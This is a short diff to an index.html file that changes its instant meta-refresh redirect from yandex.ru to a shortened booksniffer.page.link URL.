--- a/index.html
+++ b/index.html
@@ -1,3 +1,3 @@
 <head>
-  <meta http-equiv='refresh' content='0; URL=https://yandex.ru/'>
+  <meta http-equiv='refresh' content='0; URL=https://booksniffer.page.link/Zi7X'>
 </head>
